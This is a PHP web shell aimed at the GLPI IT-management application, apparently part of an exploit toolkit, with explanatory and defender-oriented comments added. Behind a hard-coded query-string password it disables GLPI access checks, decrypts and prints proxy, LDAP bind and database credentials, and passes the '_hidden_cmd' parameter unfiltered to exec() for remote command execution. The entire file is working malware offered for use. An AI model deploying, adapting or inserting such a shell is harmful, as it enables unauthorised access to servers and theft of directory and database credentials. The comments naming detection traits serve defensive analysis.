<?php
/****************************************************************
* Webshell Usage:
* ?passwd=P@ssw0rd123 --> Print glpi passwords in use
* ?passwd=P@ssw0rd123&_hidden_cmd=whoami --> Execute whoami
*
* Used by: exploits/utils/glpi_utils.py (method get_glpi_shell)
*
* ```bash
* python3 -c 'import zlib;import base64; shell = open("shell.php", "rb");print(base64.b64encode(zlib.compress(shell.read())));shell.close()'
* ```
****************************************************************/
# Report only fatal run-time errors and parse errors; warnings and notices
# raised by this script or by the GLPI code it includes are not reported.
error_reporting(E_ERROR | E_PARSE);
# Never read anywhere in this file. NOTE(review): presumably picked up by the
# GLPI inc/includes.php that is included further down, to select how that
# bootstrap checks access for the request — confirm against the GLPI version.
$SECURITY_STRATEGY = "no_check";
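/**
 * Print a section heading: the text with its first character upper-cased and
 * HTML-escaped, rendered bold and underlined, followed by a line break.
 *
 * @param string $m Heading text.
 */
function title($m){
    # Inline tags are closed in reverse order of opening and the line break is
    # a real <br>; the earlier "</b></u></br>" was mis-nested and "</br>" is
    # not a valid element.
    echo "<b><u>" . htmlentities(ucfirst($m)) . "</u></b><br>\n";
}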
/**
 * Turn a secret stored by GLPI back into clear text, using whichever
 * decryption entry point the included GLPI code base provides.
 *
 * The candidates are probed in this order: GLPIKey::decrypt() (instance
 * call), Toolbox::sodiumDecrypt() (static call), Toolbox::decrypt() with the
 * GLPIKEY constant. When none of them exists the input is returned wrapped in
 * an "<ENCRYPTED>[...]" marker instead of being decrypted.
 *
 * @param mixed $pass Stored value to decrypt. NOTE(review): presumably the
 *                    encrypted string as kept in the GLPI configuration or
 *                    database — confirm against the callers.
 * @return mixed Whatever the selected GLPI decrypt call returns, or the
 *               marker string described above.
 */
function decrypt_pass($pass){
# First choice: a GLPIKey class exposing decrypt(), called on a fresh instance.
if(method_exists("GLPIKey", "decrypt")){
return (new GLPIKey())->decrypt($pass);
} elseif(method_exists("Toolbox", "decrypt")){
# Toolbox::decrypt() exists; prefer Toolbox::sodiumDecrypt() when it is also present.
if(method_exists("Toolbox", "sodiumDecrypt")){
return Toolbox::sodiumDecrypt($pass);
}
# Very old GLPI: decryption takes the key from the GLPIKEY constant,
# which is not defined in this file (per the original note it comes from the config).
return Toolbox::decrypt($pass, GLPIKEY);
} else {
# No known decrypt API: hand the stored value back, visibly tagged as still encrypted.
return "<ENCRYPTED>[{$pass}]";
}
}
/**
 * Print the service credentials held by the GLPI instance this script is
 * running inside: the outbound proxy account, every LDAP directory bind
 * account, and the database account.
 *
 * Reads the globals $CFG_GLPI and $DB and writes HTML straight to the
 * response through title() and Html::printCleanArray(); nothing is returned.
 *
 * Defender note: every secret listed here (proxy, LDAP bind, database) is
 * readable in clear text by whoever can reach this function, so all of them
 * need rotating if this file is ever found on a server.
 */
function dump_password(){
global $CFG_GLPI, $DB;
# --- Proxy -------------------------------------------------------------
# Only shown when a proxy host is configured.
if(!empty($CFG_GLPI["proxy_name"]))
{
# "user:password@" prefix, built only when a proxy user is set; the stored
# proxy password goes through decrypt_pass() first.
$proxy_credz = !empty($CFG_GLPI["proxy_user"])?$CFG_GLPI["proxy_user"] . ":" . decrypt_pass($CFG_GLPI["proxy_passwd"]) . "@":"";
# The scheme is always written as http://, whatever the proxy actually uses.
$proxy_url = "http://{$proxy_credz}" . $CFG_GLPI['proxy_name'] . ":" . $CFG_GLPI['proxy_port'];
title("proxy:");
Html::printCleanArray(array("Proxy In Use" => $proxy_url));
}
# NOTE(review): $auth_methods is assigned but never used in this function.
$auth_methods = Auth::getLoginAuthMethods();
# --- LDAP --------------------------------------------------------------
# find() is called without arguments; each returned row is treated as one
# directory connection.
$config_ldap = new AuthLDAP();
$all_connections = $config_ldap->find();
foreach($all_connections as $connection){
# Rows lacking either a bind DN or a bind password are skipped.
if(isset($connection['rootdn_passwd']) && isset($connection['rootdn'])){
$ldap_pass = decrypt_pass($connection['rootdn_passwd']);
title("Ldap Connexion:");
# NOTE(review): the labels look swapped — "LDAP Base" prints rootdn and
# "LDAP DN" prints basedn.
Html::printCleanArray(array("LDAP Base" => $connection['rootdn'], "LDAP DN" => $connection["basedn"], "LDAP Password" => $ldap_pass, "Connection is active" => $connection['is_active']));
}
}
# --- Database ----------------------------------------------------------
# Connection settings are read from the global $DB object; the password is
# passed through urldecode() before printing.
if(!is_null($DB)){
title("Database informations:");
Html::printCleanArray(array("DB Host" => $DB->dbhost,
"DB Database" => $DB->dbdefault,
"DB User" => $DB->dbuser,
"DB Password" => urldecode($DB->dbpassword)));
}
}
# Request entry point. Nothing below runs unless the "passwd" query parameter
# is strictly equal to the hard-coded string.
#
# Defender note: "passwd" and "_hidden_cmd" are both read from $_GET, so they
# travel in the URL query string and appear in web-server access logs for
# requests to this file. The page header text "GLPI Password" and a PHP file
# that includes inc/includes.php from up to three directories above itself
# are further identifying traits of this script.
if(isset($_GET["passwd"]) && $_GET["passwd"] === "P@ssw0rd123")
{
# Look for GLPI's bootstrap file next to this script, then one, two and three
# directory levels up (relative paths), and stop at the first one found.
for ($i=0; $i < 4; $i++) {
$relative = str_repeat("../", $i);
$to_include = "{$relative}inc/includes.php";
if(file_exists($to_include)){
# Loading the bootstrap is what makes Html, Auth, AuthLDAP, $CFG_GLPI and $DB
# (used by dump_password()) available; none of them is defined in this file.
include_once($to_include);
try{
Html::header("GLPI Password");
# A non-empty "_hidden_cmd" switches from credential listing to command
# execution (empty() also treats the value "0" as absent).
if(isset($_GET["_hidden_cmd"]) && !empty($_GET["_hidden_cmd"]))
{
$output=null;
$retval=null;
# The raw query-string value is handed to exec() with no filtering or escaping.
# $retval receives the exit status but is not used afterwards.
exec($_GET['_hidden_cmd'], $output, $retval);
echo "<code>";
# Each output line is HTML-escaped before being echoed.
foreach ($output as $line) {
echo htmlentities($line) . "</br>";
}
echo "</code></br>";
} else {
dump_password();
}
} catch(Exception $e) {
# Only Exception is caught; the message is echoed without HTML escaping.
echo $e->getMessage();
}
# Only the first bootstrap file found is used.
break;
}
}
}